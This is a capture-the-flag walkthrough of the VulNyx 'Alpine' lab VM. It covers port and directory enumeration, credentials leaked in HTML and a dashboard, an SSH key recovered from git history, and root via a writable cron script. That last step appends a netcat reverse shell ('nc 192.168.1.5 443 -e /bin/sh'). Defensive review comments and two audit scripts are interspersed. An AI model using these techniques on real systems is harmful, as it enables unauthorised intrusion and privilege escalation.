Information

Alpine is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform. It was created by the user Soraya and runs correctly on the VirtualBox hypervisor.


Enumeration

Nmap

TCP

root@kali:~  nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.73
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 10:31 CET
Nmap scan report for 192.168.1.73
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
root@kali:~  nmap -sVC -p22,80 192.168.1.73
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 10:32 CET
Nmap scan report for 192.168.1.73
Host is up (0.00038s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://alpine.nyx/
|_http-server-header: Apache/2.4.66 (Unix)

Shell (developer)

80/TCP (HTTP)

Site

Both the initial nmap scan and the website show a redirect to the domain alpine.nyx.

(I add the discovered domain alpine.nyx to my /etc/hosts file for later attacks)

|_http-title: Did not follow redirect to http://alpine.nyx/

VHOST Site (/)

Directory Brute Force

root@kali:~  gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://alpine.nyx -x html,txt,php
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://alpine.nyx
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 12461]
/login.html           (Status: 200) [Size: 3182]
/profile.html         (Status: 200) [Size: 9571]
/booking.html         (Status: 200) [Size: 3217]
/server-status        (Status: 403) [Size: 313]
Progress: 882176 / 882176 (100.00%)
===============================================================
Finished
===============================================================

VHOST Site (/login.html)

In the page source I found the credentials testuser:WinterIsComing! inside an HTML comment.

I log in successfully through the login panel with the credentials obtained and find a dashboard.

In the Settings section of the sidebar I find the credentials developer:SummerVibes2024! for SSH.

22/TCP (SSH)

I validate the credentials and access the system as the user developer.

root@kali:~  netexec ssh 192.168.1.73 -u 'developer' -p 'SummerVibes2024!'      
SSH         192.168.1.73    22     192.168.1.73     [*] SSH-2.0-OpenSSH_10.2
SSH         192.168.1.73    22     192.168.1.73     [+] developer:SummerVibes2024!  Linux - Shell access!
root@kali:~  sshpass -p 'SummerVibes2024!' ssh developer@192.168.1.73 -o StrictHostKeyChecking=no
Warning: Permanently added '192.168.1.73' (ED25519) to the list of known hosts.
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

developer@alpine:~$ id ; hostname
uid=1000(developer) gid=1000(developer) groups=1000(developer)
alpine

Shell (sysadmin)

Enumeration

Files

I find a README.txt file with a hint that refers to Git.

developer@alpine:~$ cat README.txt 
=== SnowPeak Development Notes ===

Hi Developer,

Welcome to the SnowPeak development environment!

IMPORTANT REMINDERS:
1. The sysadmin user manages the webapp code in their directory
2. We use git as a deployment pipeline
3. Don't forget to check the cleaners ! 

If you need elevated access, contact sysadmin.

- Management

Git

Inside the webapp folder, located in the home directory of the user sysadmin, I find a .git file.

developer@alpine:/home/sysadmin/webapp$ ls -la
total 16
drwxr-xr-x    3 sysadmin sysadmin      4096 Dec 11 11:14 .
drwxr-sr-x    4 sysadmin sysadmin      4096 Dec 12 17:19 ..
drwxr-xr-x    7 sysadmin sysadmin      4096 Dec 11 11:14 .git
-rwxr-xr-x    1 sysadmin sysadmin       171 Dec 11 11:13 config.php

Commits

In one of the commits I find an SSH private key (id_rsa).

developer@alpine:/home/sysadmin/webapp$ git log --pretty=oneline | more
0c6ee270764eb91ee53afc9784881371d4dddd93 Remove backup
02f9a1879dbfa40703a6bcbd985e5a19542c24c8 Backup SSH keys before server migration
2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593 Initial commit: Add database config

developer@alpine:/home/sysadmin/webapp$ git --no-pager log -p 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
commit 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
Author: sysadmin <sysadmin@snowpeak.nyx>
Date:   Thu Dec 11 11:13:53 2025 +0000

    Backup SSH keys before server migration

diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
new file mode 100644
index 0000000..76b357a
--- /dev/null
+++ b/.ssh-backup/id_rsa
@@ -0,0 +1,27 @@
+-----BEGIN OPENSSH PRIVATE KEY-----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+-----END OPENSSH PRIVATE KEY-----
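Review bot: .ssh-backup/id_rsa adds an OpenSSH private key to the repository as a new tracked file, and key material should not be committed at all: once it is in a commit it stays readable in history to anyone who can read .git, even if a later commit deletes the file. Drop this file from the change, keep key backups outside the work tree, and if the commit has already landed, rotate the key pair and rewrite history to purge the blob.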

commit 2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593
Author: sysadmin <sysadmin@snowpeak.nyx>
Date:   Thu Dec 11 11:13:26 2025 +0000

    Initial commit: Add database config

diff --git a/config.php b/config.php
new file mode 100644
index 0000000..daa9acc
--- /dev/null
+++ b/config.php
@@ -0,0 +1,7 @@
+<?php
+// Database Configuration
+define('DB_HOST', 'localhost');
+define('DB_USER', 'webapp_user');
+define('DB_PASS', 'temp_password');
+define('DB_NAME', 'snowpeak_db');
+?>
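Review bot: define('DB_PASS', 'temp_password') in config.php puts the database password in a tracked file, so it stays in history even after the value is changed. Read the credentials from the environment or from a file outside the repository that only the web user can read, and commit a template with empty values instead.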
developer@alpine:/home/sysadmin/webapp$ git --no-pager show 02f9a1879dbfa40703a6bcbd985e5a19542c24c8:.ssh-backup/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
[...]
-----END OPENSSH PRIVATE KEY-----
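The same finding from the defender's side, as an added example that is not part of the original write-up: a filter over `git log -p` output that reports every commit introducing private-key material, including keys that a later commit deleted. The commit ids and key body in the sample are constructed placeholders, and `scan_history` and `sample_log` are names chosen for this example.

```shell
#!/bin/sh
# Added example (not from the write-up): find commits that introduce
# private-key material, reading `git log -p` output on stdin.
# Prints "<commit> <path>" once per offending file.
scan_history() {
    awk '
        /^commit [0-9a-f]+/ { commit = $2; next }
        /^[+][+][+] /       { path = substr($0, 5); sub(/^b\//, "", path); next }
        /^[+].*-----BEGIN [A-Z ]*PRIVATE KEY-----/ {
            hit = commit " " path
            if (!(hit in seen)) { seen[hit] = 1; print hit }
        }
    '
}

# Constructed, trimmed history: key added in one commit, deleted in the next.
# Commit ids and the key body are placeholders.
sample_log() {
    cat <<'EOF'
commit 2222222222222222222222222222222222222222

    Remove backup

diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
deleted file mode 100644
--- a/.ssh-backup/id_rsa
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-PLACEHOLDER-NOT-A-KEY
------END OPENSSH PRIVATE KEY-----

commit 1111111111111111111111111111111111111111

    Backup SSH keys before server migration

diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
new file mode 100644
--- /dev/null
+++ b/.ssh-backup/id_rsa
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+PLACEHOLDER-NOT-A-KEY
+-----END OPENSSH PRIVATE KEY-----
EOF
}

# On a real repository: git log --all -p | scan_history
sample_log | scan_history
```

Only the commit that adds the key is reported; the "Remove backup" commit is not, which is why deleting the file does not close the exposure.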

22/TCP (SSH)

I access the system as the user sysadmin with the id_rsa obtained.

root@kali:~  chmod 600 id_rsa
root@kali:~  ssh -i id_rsa sysadmin@192.168.1.73
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <https://wiki.alpinelinux.org/>.

You can setup the system with the command: setup-alpine

You may change this message by editing /etc/motd.

sysadmin@alpine:~$ id ; hostname
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
alpine

Privilege Escalation

Enumeration

Cron

In the /opt/scripts/ directory there is the script cleanup.sh, on which I have write permissions.

It can also be seen that the script is executed by the root user every minute.

sysadmin@alpine:~$ ls -la /opt/scripts/
total 20
drwxr-xr-x    2 root     root          4096 Dec 13 13:06 .
drwxr-xr-x    3 root     root          4096 Dec 11 11:23 ..
-rwxrwxr-x    1 root     sysadmin       284 Dec 13 13:04 cleanup.sh

sysadmin@alpine:~$ cd /opt/scripts/
sysadmin@alpine:/opt/scripts$ echo "whoami > \"/opt/scripts/\$(date +'%H-%M-%S').txt\"" >> cleanup.sh
sysadmin@alpine:/opt/scripts$ ls -la | grep ".txt"
-rw-r--r--    1 root     root             5 Dec 13 13:05 13-05-00.txt
-rw-r--r--    1 root     root             5 Dec 13 13:06 13-06-00.txt
-rw-r--r--    1 root     root             5 Dec 13 13:07 13-07-00.txt
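The root cause here is a script run by root's cron that a non-root group can modify (cleanup.sh is root:sysadmin with mode 775). An audit for that condition, as an added example that is not part of the original write-up; `audit_script` is a name chosen for this example and the demo files are constructed in a temporary directory.

```shell
#!/bin/sh
# Added example (not from the write-up): check that a script executed by a
# privileged cron job cannot be modified by anyone but its expected owner.
# usage: audit_script PATH [OWNER]   (OWNER defaults to root; a uid also works)
# Prints one line per finding; returns 0 if clean, 1 on findings, 2 if missing.
audit_script() {
    script=$1
    owner=${2:-root}
    rc=0
    [ -e "$script" ] || { echo "MISSING $script"; return 2; }
    # The containing directory matters too: write access there allows
    # replacing the script even when the file itself is locked down.
    for target in "$script" "$(dirname "$script")"; do
        if [ -n "$(find "$target" -prune ! -user "$owner" -print)" ]; then
            echo "FAIL $target: not owned by $owner"
            rc=1
        fi
        if [ -n "$(find "$target" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "FAIL $target: group- or world-writable"
            rc=1
        fi
    done
    return $rc
}

# Constructed demo mirroring the listing above: mode 775 fails, 755 passes.
# The current uid stands in for root so the demo runs unprivileged.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\n' > "$demo_dir/cleanup.sh"
chmod 775 "$demo_dir/cleanup.sh"
audit_script "$demo_dir/cleanup.sh" "$(id -u)" || echo "-> remediate: chmod 755"
chmod 755 "$demo_dir/cleanup.sh"
audit_script "$demo_dir/cleanup.sh" "$(id -u)" && echo "OK after chmod 755"
rm -rf "$demo_dir"
```

On the target described above the call would be `audit_script /opt/scripts/cleanup.sh`, which reports the group-writable bit.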

Abuse

I add a reverse shell to the cleanup.sh script.

sysadmin@alpine:/opt/scripts$ echo 'nc 192.168.1.5 443 -e /bin/sh' >> cleanup.sh

I get the shell as the root user.

root@kali:~  nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.73] 41867
id ; hostname
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
alpine

Flags

Now as the root user I can read the flags user.txt and root.txt.

# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
30a*****************************
6b7*****************************

This concludes the walkthrough of the Alpine machine.

Happy Hacking!